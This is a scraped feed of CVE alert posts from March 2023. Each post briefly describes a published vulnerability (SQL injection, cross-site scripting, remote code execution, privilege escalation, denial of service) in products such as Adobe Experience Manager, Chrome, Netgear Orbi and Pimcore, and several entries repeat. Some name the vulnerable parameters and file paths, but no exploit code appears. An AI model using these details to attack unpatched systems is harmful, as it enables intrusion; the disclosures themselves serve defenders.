🚨 CVE-2022-43863IBM QRadar SIEM 7.4 and 7.5 is vulnerable to privilege escalation, allowing a user with some admin capabilities to gain additional admin capabilities. IBM X-Force ID: 239425.🎖@cveNotify |
|
| 2023-03-23 01:29:41 |
🚨 CVE-2023-27054A cross-site scripting (XSS) vulnerability in MiroTalk P2P before commit f535b35 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the settings module.🎖@cveNotify |
|
| 2023-03-23 01:29:40 |
🚨 CVE-2023-27060LightCMS v1.3.7 was discovered to contain a remote code execution (RCE) vulnerability via the image:make function.🎖@cveNotify |
|
| 2023-03-22 23:29:47 |
🚨 CVE-2023-1431The WP Simple Shopping Cart plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.6.3 due to the plugin saving shopping cart data exports in a publicly accessible location (/wp-content/plugins/wordpress-simple-paypal-shopping-cart/includes/admin/). This makes it possible for unauthenticated attackers to view information that should be limited to administrators only and can include data like first name, last name, email, address, IP Address, and more.🎖@cveNotify |
|
| 2023-03-22 23:29:46 |
🚨 CVE-2023-28119The crewjam/saml go library contains a partial implementation of the SAML standard in golang. Prior to version 0.4.13, the package's use of `flate.NewReader` does not limit the size of the input. The user can pass more than 1 MB of data in the HTTP request to the processing functions, which will be decompressed server-side using the Deflate algorithm. Therefore, after repeating the same request multiple times, it is possible to achieve a reliable crash since the operating system kills the process. This issue is patched in version 0.4.13.🎖@cveNotify |
|
| 2023-03-22 23:29:43 |
🚨 CVE-2023-27224An issue found in NginxProxyManager v.2.9.19 allows an attacker to execute arbitrary code via a lua script to the configuration file.🎖@cveNotify |
|
| 2023-03-22 23:29:42 |
🚨 CVE-2023-28117Sentry SDK is the official Python SDK for Sentry, real-time crash reporting software. When using the Django integration of versions prior to 1.14.0 of the Sentry SDK in a specific configuration it is possible to leak sensitive cookies values, including the session cookie to Sentry. These sensitive cookies could then be used by someone with access to your Sentry issues to impersonate or escalate their privileges within your application. In order for these sensitive values to be leaked, the Sentry SDK configuration must have `sendDefaultPII` set to `True`; one must use a custom name for either `SESSION_COOKIE_NAME` or `CSRF_COOKIE_NAME` in one's Django settings; and one must not be configured in one's organization or project settings to use Sentry's data scrubbing features to account for the custom cookie names. As of version 1.14.0, the Django integration of the `sentry-sdk` will detect the custom cookie names based on one's Django settings and will remove the values from the payload before sending the data to Sentry. As a workaround, use the SDK's filtering mechanism to remove the cookies from the payload that is sent to Sentry. For error events, this can be done with the `before_send` callback method and for performance related events (transactions) one can use the `before_send_transaction` callback method. Those who want to handle filtering of these values on the server-side can also use Sentry's advanced data scrubbing feature to account for the custom cookie names. Look for the `$http.cookies`, `$http.headers`, `$request.cookies`, or `$request.headers` fields to target with a scrubbing rule.🎖@cveNotify |
|
| 2023-03-22 23:29:39 |
🚨 CVE-2023-27069A stored cross-site scripting (XSS) vulnerability in TotalJS OpenPlatform commit b80b09d allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the account name field.🎖@cveNotify |
|
| 2023-03-22 23:29:38 |
🚨 CVE-2023-25615Due to insufficient input sanitization, SAP ABAP - versions 751, 753, 753, 754, 756, 757, 791, allows an authenticated high privileged user to alter the current session of the user by injecting the malicious database queries over the network and gain access to the unintended data. This may lead to a high impact on the confidentiality and no impact on the availability and integrity of the application.🎖@cveNotify |
|
| 2023-03-22 23:29:37 |
🚨 CVE-2023-24279A cross-site scripting (XSS) vulnerability in Open Networking Foundation ONOS from version v1.9.0 to v2.7.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the url parameter of the API documentation dashboard.🎖@cveNotify |
|
| 2023-03-22 23:29:36 |
🚨 CVE-2023-24769Changedetection.io before v0.40.1.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the main page. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter under the "Add a new change detection watch" function.🎖@cveNotify |
|
| 2023-03-22 22:30:01 |
🚨 CVE-2023-24579McAfee Total Protection prior to 16.0.51 allows attackers to trick a victim into uninstalling the application via the command prompt.🎖@cveNotify |
|
| 2023-03-22 22:30:00 |
🚨 CVE-2023-27041School Registration and Fee System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at/bilal final/edit_user.php.🎖@cveNotify |
|
| 2023-03-22 22:29:59 |
🚨 CVE-2023-28106Pimcore is an open source data and experience management platform. Prior to version 10.5.19, an attacker can use cross-site scripting to send a malicious script to an unsuspecting user. Users may upgrade to version 10.5.19 to receive a patch or, as a workaround, apply the patch manually.🎖@cveNotify |
|
| 2023-03-22 22:29:58 |
🚨 CVE-2023-28108Pimcore is an open source data and experience management platform. Prior to version 10.5.19, quoting is not done properly in UUID DAO model. There is the theoretical possibility to inject custom SQL if the developer is using this methods with input data and not doing proper input validation in advance and so relies on the auto-quoting being done by the DAO class. Users should update to version 10.5.19 to receive a patch or, as a workaround, apply the patch manually.🎖@cveNotify |
|
| 2023-03-22 22:29:54 |
🚨 CVE-2021-31402The dio package 4.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669.🎖@cveNotify |
|
| 2023-03-22 22:29:53 |
🚨 CVE-2023-28104`silverstripe/graphql` serves Silverstripe data as GraphQL representations. In versions 4.2.2 and 4.1.1, an attacker could use a specially crafted graphql query to execute a denial of service attack against a website which has a publicly exposed graphql endpoint. This mostly affects websites with particularly large/complex graphql schemas. Users should upgrade to `silverstripe/graphql` 4.2.3 or 4.1.2 to remedy the vulnerability.🎖@cveNotify |
|
| 2023-03-22 22:29:52 |
🚨 CVE-2023-27010Wondershare Dr.Fone v12.9.6 was discovered to contain weak permissions for the service WsDrvInst. This vulnerability allows attackers to escalate privileges via modifying or overwriting the executable.🎖@cveNotify |
|
| 2023-03-22 22:29:51 |
🚨 CVE-2023-25617SAP Business Object (Adaptive Job Server) - versions 420, 430, allows remote execution of arbitrary commands on Unix, when program objects execution is enabled, to authenticated users with scheduling rights, using the BI Launchpad, Central Management Console or a custom application based on the public java SDK. Programs could impact the confidentiality, integrity and availability of the system.🎖@cveNotify |
|
| 2023-03-22 22:29:50 |
🚨 CVE-2023-22256Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 22:29:46 |
🚨 CVE-2023-22265Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 22:29:45 |
🚨 CVE-2023-0464A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this vulnerability by creating a malicious certificate chain that triggers exponential use of computational resources, leading to a denial-of-service (DoS) attack on affected systems. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.🎖@cveNotify |
|
| 2023-03-22 22:29:44 |
🚨 CVE-2023-21615Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-22 22:29:43 |
🚨 CVE-2023-21616Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-22 22:29:39 |
🚨 CVE-2023-22253Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-22 22:29:38 |
🚨 CVE-2023-22257Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 22:29:37 |
🚨 CVE-2023-22258Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 22:29:36 |
🚨 CVE-2023-22260Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:30:01 |
🚨 CVE-2023-22265Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:30:00 |
🚨 CVE-2023-1578SQL Injection in GitHub repository pimcore/pimcore prior to 10.5.19.🎖@cveNotify |
|
| 2023-03-22 18:29:59 |
🚨 CVE-2023-0464A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this vulnerability by creating a malicious certificate chain that triggers exponential use of computational resources, leading to a denial-of-service (DoS) attack on affected systems. Policy processing is disabled by default but can be enabled by passing the `-policy' argument to the command line utilities or by calling the `X509_VERIFY_PARAM_set1_policies()' function.🎖@cveNotify |
|
| 2023-03-22 18:29:58 |
🚨 CVE-2023-21616Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-22 18:29:54 |
🚨 CVE-2023-22253Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-22 18:29:53 |
🚨 CVE-2023-22254Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-22 18:29:52 |
🚨 CVE-2023-22257Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:29:51 |
🚨 CVE-2023-22258Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:29:50 |
🚨 CVE-2023-22260Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:29:46 |
🚨 CVE-2023-22261Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:29:45 |
🚨 CVE-2023-22263Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:29:44 |
🚨 CVE-2023-22264Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:29:43 |
🚨 CVE-2023-22266Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-22 18:29:39 |
🚨 CVE-2023-22269Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-22 18:29:38 |
🚨 CVE-2023-25859Illustrator version 26.5.2 (and earlier) and 27.2.0 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-22 18:29:37 |
🚨 CVE-2023-25861Illustrator version 26.5.2 (and earlier) and 27.2.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-03-22 17:29:58 |
🚨 CVE-2023-1563A vulnerability has been found in SourceCodester Student Study Center Desk Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/assign/assign.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223555.🎖@cveNotify |
|
| 2023-03-22 17:29:54 |
🚨 CVE-2023-1564A vulnerability was found in SourceCodester Air Cargo Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/transactions/update_status.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223556.🎖@cveNotify |
|
| 2023-03-22 17:29:53 |
🚨 CVE-2023-1572A vulnerability has been found in DataGear up to 1.11.1 and classified as problematic. This vulnerability affects unknown code of the component Plugin Handler. The manipulation leads to cross site scripting. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 1.12.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-223564.🎖@cveNotify |
|
| 2023-03-22 17:29:52 |
🚨 CVE-2023-27637An issue was discovered in the tshirtecommerce (aka Custom Product Designer) component 2.1.4 for PrestaShop. An HTTP request can be forged with a compromised product_id GET parameter in order to exploit an insecure parameter in the front controller file designer.php, which could lead to a SQL injection. This is exploited in the wild in March 2023.🎖@cveNotify |
|
| 2023-03-22 17:29:51 |
🚨 CVE-2023-27638An issue was discovered in the tshirtecommerce (aka Custom Product Designer) component 2.1.4 for PrestaShop. An HTTP request can be forged with a compromised tshirtecommerce_design_cart_id GET parameter in order to exploit an insecure parameter in the functions hookActionCartSave and updateCustomizationTable, which could lead to a SQL injection. This is exploited in the wild in March 2023.🎖@cveNotify |
|
| 2023-03-22 17:29:47 |
🚨 CVE-2022-34420Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-22 17:29:46 |
🚨 CVE-2022-34419Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-22 17:29:45 |
🚨 CVE-2022-34418Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-22 17:29:44 |
🚨 CVE-2022-34417Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-22 17:29:40 |
🚨 CVE-2022-34422Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-22 17:29:39 |
🚨 CVE-2022-34409Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-22 17:29:38 |
🚨 CVE-2023-26460Cache Management Service in SAP NetWeaver Application Server for Java - version 7.50, does not perform any authentication checks for functionalities that require user identity🎖@cveNotify |
|
| 2023-03-22 17:29:37 |
🚨 CVE-2023-28486Sudo before 1.9.13 does not escape control characters in log messages.🎖@cveNotify |
|
| 2023-03-22 15:29:57 |
🚨 CVE-2023-27638An issue was discovered in the tshirtecommerce (aka Custom Product Designer) component 2.1.4 for PrestaShop. An HTTP request can be forged with a compromised tshirtecommerce_design_cart_id GET parameter in order to exploit an insecure parameter in the functions hookActionCartSave and updateCustomizationTable, which could lead to a SQL injection. This is exploited in the wild in March 2023.🎖@cveNotify |
|
| 2023-03-22 15:29:56 |
🚨 CVE-2023-24892Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability🎖@cveNotify |
|
| 2023-03-22 15:29:55 |
🚨 CVE-2023-25589A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to create arbitrary users on the platform. A successful exploit allows an attacker to achieve total cluster compromise.🎖@cveNotify |
|
| 2023-03-22 15:29:54 |
🚨 CVE-2022-37940Potential security vulnerabilities have been identified in the HPE FlexFabric 5700 Switch Series. These vulnerabilities could be remotely exploited to allow host header injection and URL redirection. HPE has made the following software to resolve the vulnerability in HPE FlexFabric 5700 Switch Series version R2432P61 or later.🎖@cveNotify |
|
| 2023-03-22 15:29:50 |
🚨 CVE-2023-1436An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. This leads to a StackOverflowError exception being thrown.🎖@cveNotify |
|
| 2023-03-22 15:29:49 |
🚨 CVE-2023-25069TXOne StellarOne has an improper access control privilege escalation vulnerability in every version before V2.0.1160 that could allow a malicious, falsely authenticated user to escalate his privileges to administrator level. With these privileges, an attacker could perform actions they are not authorized to. Please note: an attacker must first obtain a low-privileged authenticated user's profile on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-03-22 15:29:48 |
🚨 CVE-2023-27855In affected versions, a path traversal exists when processing a message in Rockwell Automation's ThinManager ThinServer. An unauthenticated remote attacker could potentially exploit this vulnerability to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker could overwrite existing executable files with attacker-controlled, malicious contents, potentially causing remote code execution.🎖@cveNotify |
|
| 2023-03-22 15:29:44 |
🚨 CVE-2023-27856In affected versions, path traversal exists when processing a message of type 8 in Rockwell Automation's ThinManager ThinServer. An unauthenticated remote attacker can exploit this vulnerability to download arbitrary files on the disk drive where ThinServer.exe is installed.🎖@cveNotify |
|
| 2023-03-22 15:29:43 |
🚨 CVE-2022-45634An issue discovered in MEGAFEIS, BOFEI DBD+ Application for IOS & Android v1.4.4 allows authenticated attacker to gain access to sensitive account information🎖@cveNotify |
|
| 2023-03-22 15:29:42 |
🚨 CVE-2022-41696Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 15:29:38 |
🚨 CVE-2022-43512Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 15:29:37 |
🚨 CVE-2022-45468Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 15:29:36 |
🚨 CVE-2022-46286Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 15:29:35 |
🚨 CVE-2022-46300Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 06:29:39 |
🚨 CVE-2021-31637An issue found in UwAmp v.1.1, 1.2, 1.3, 2.0, 2.1, 2.2, 2.2.1, 3.0.0, 3.0.1, 3.0.2 allows a remote attacker to execute arbitrary code via a crafted DLL.🎖@cveNotify |
|
| 2023-03-22 06:29:38 |
🚨 CVE-2020-19947Cross Site Scripting vulnerability found in Markdown Edit allows a remote attacker to execute arbitrary code via the edit parameter of the webpage.🎖@cveNotify |
|
| 2023-03-22 06:29:37 |
🚨 CVE-2023-28725General Bytes Crypto Application Server (CAS) 20230120, as distributed with General Bytes BATM devices, allows remote attackers to execute arbitrary Java code by uploading a Java application to the /batm/app/admin/standalone/deployments directory, aka BATM-4780, as exploited in the wild in March 2023. This is fixed in 20221118.48 and 20230120.44.🎖@cveNotify |
|
| 2023-03-22 06:29:36 |
🚨 CVE-2022-41418An issue in the component BlogEngine/BlogEngine.NET/AppCode/Api/UploadController.cs of BlogEngine.NET v3.3.8.0 allows attackers to execute arbitrary code via uploading a crafted PNG file.🎖@cveNotify |
|
| 2023-03-22 01:29:51 |
🚨 CVE-2022-41696Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 01:29:49 |
🚨 CVE-2022-43512Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 01:29:48 |
🚨 CVE-2022-45121Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 01:29:47 |
🚨 CVE-2022-46286Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 01:29:42 |
🚨 CVE-2022-46300Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-22 01:29:41 |
🚨 CVE-2023-24709An issue found in Paradox Security Systems IPR512 allows attackers to cause a denial of service via the login.html and login.xml parameters.🎖@cveNotify |
|
| 2023-03-22 01:29:40 |
🚨 CVE-2023-27250Online Book Store Project v1.0 is vulnerable to SQL Injection via /bookstore/bookPerPub.php.🎖@cveNotify |
|
| 2023-03-22 01:29:39 |
🚨 CVE-2023-26497An issue was discovered in Samsung Baseband Modem Chipset for Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, and Exynos Auto T5125. Memory corruption can occur when processing Session Description Negotiation for Video Configuration Attribute.🎖@cveNotify |
|
| 2023-03-22 01:29:38 |
🚨 CVE-2023-0391MGT-COMMERCE CloudPanel ships with a static SSL certificate to encrypt communications to the administrative interface, shared across every installation of CloudPanel. This behavior was observed in version 2.2.0. There has been no indication from the vendor this has been addressed in version 2.2.1.🎖@cveNotify |
|
| 2023-03-21 23:30:08 |
🚨 CVE-2023-1529Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-21 23:30:07 |
🚨 CVE-2023-1530Use after free in PDF in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-21 23:30:06 |
🚨 CVE-2023-1531Use after free in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-21 23:30:04 |
🚨 CVE-2023-1532Out of bounds read in GPU Video in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-21 23:30:03 |
🚨 CVE-2023-1533Use after free in WebProtect in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-21 23:30:02 |
🚨 CVE-2023-1534Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-21 23:30:01 |
🚨 CVE-2022-45155An Improper Handling of Exceptional Conditions vulnerability in obs-service-go_modules of openSUSE Factory allows attackers that can influence the call to the service to delete files and directories on the system of the victim. This issue affects: SUSE openSUSE Factory obs-service-go_modules versions prior to 0.6.1.🎖@cveNotify |
|
| 2023-03-21 23:30:00 |
🚨 CVE-2023-0391MGT-COMMERCE CloudPanel ships with a static SSL certificate to encrypt communications to the administrative interface, shared across every installation of CloudPanel. This behavior was observed in version 2.2.0. There has been no indication from the vendor this has been addressed in version 2.2.1.🎖@cveNotify |
|
| 2023-03-21 23:29:59 |
🚨 CVE-2022-36429A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-21 23:29:58 |
🚨 CVE-2022-37337A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-21 23:29:57 |
🚨 CVE-2022-38452A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-21 23:29:56 |
🚨 CVE-2022-38458A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.🎖@cveNotify |
|
| 2023-03-21 23:29:55 |
🚨 CVE-2022-45636An issue discovered in MEGAFEIS, BOFEI DBD+ Application for IOS & Android v1.4.4 allows attacker to unlock model(s) without authorization via arbitrary API requests.🎖@cveNotify |
|
| 2023-03-21 23:29:54 |
🚨 CVE-2018-25082A vulnerability was found in zwczou WeChat SDK Python 0.3.0 and classified as critical. This issue affects the function validate/to_xml. The manipulation leads to xml external entity reference. The attack may be initiated remotely. Upgrading to version 0.5.5 is able to address this issue. The name of the patch is e54abadc777715b6dcb545c13214d1dea63df6c9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-223403.🎖@cveNotify |
|
| 2023-03-21 23:29:53 |
🚨 CVE-2023-25134McAfee Total Protection prior to 16.0.50 may allow an adversary (with full administrative access) to modify a McAfee specific Component Object Model (COM) in the Windows Registry. This can result in the loading of a malicious payload.🎖@cveNotify |
|
| 2023-03-21 23:29:52 |
🚨 CVE-2023-27087Permissions vulnerabiltiy found in Xuxueli xxl-job v2.2.0, v 2.3.0 and v.2.3.1 allows attacker to obtain sensitive information via the pageList parameter.🎖@cveNotify |
|
| 2023-03-21 23:29:51 |
🚨 CVE-2023-1304An authenticated attacker can leverage an exposed getattr() method via a Jinja template to smuggle OS commands and perform other actions that are normally expected to be private methods. This issue was resolved in the Managed and SaaS deployments on February 1, 2023, and in version 23.2.1 of the Self-Managed version of InsightCloudSec.🎖@cveNotify |
|
| 2023-03-21 23:29:50 |
🚨 CVE-2023-1305An authenticated attacker can leverage an exposed “box” object to read and write arbitrary files from disk, provided those files can be parsed as yaml or JSON. This issue was resolved in the Managed and SaaS deployments on February 1, 2023, and in version 23.2.1 of the Self-Managed version of InsightCloudSec.🎖@cveNotify |
|
| 2023-03-21 23:29:49 |
🚨 CVE-2023-1306An authenticated attacker can leverage an exposed resource.db() accessor method to smuggle Python method calls via a Jinja template, which can lead to code execution. This issue was resolved in the Managed and SaaS deployments on February 1, 2023, and in version 23.2.1 of the Self-Managed version of InsightCloudSec.🎖@cveNotify |
|
| 2023-03-21 23:29:48 |
🚨 CVE-2023-25684IBM Security Guardium Key Lifecycle Manager 3.0, 3.0.1, 4.0, 4.1, and 4.1.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 247597.🎖@cveNotify |
|
| 2023-03-21 20:29:52 |
🚨 CVE-2023-24760An issue found in Ofcms v.1.1.4 allows a remote attacker to to escalate privileges via the respwd method in SysUserController.🎖@cveNotify |
|
| 2023-03-21 20:29:51 |
🚨 CVE-2023-27095Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker toescalate privileges via the AddUser method of the UserController function in Tenant Management module.🎖@cveNotify |
|
| 2023-03-21 20:29:48 |
🚨 CVE-2022-36429A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.🎖@cveNotify |
|
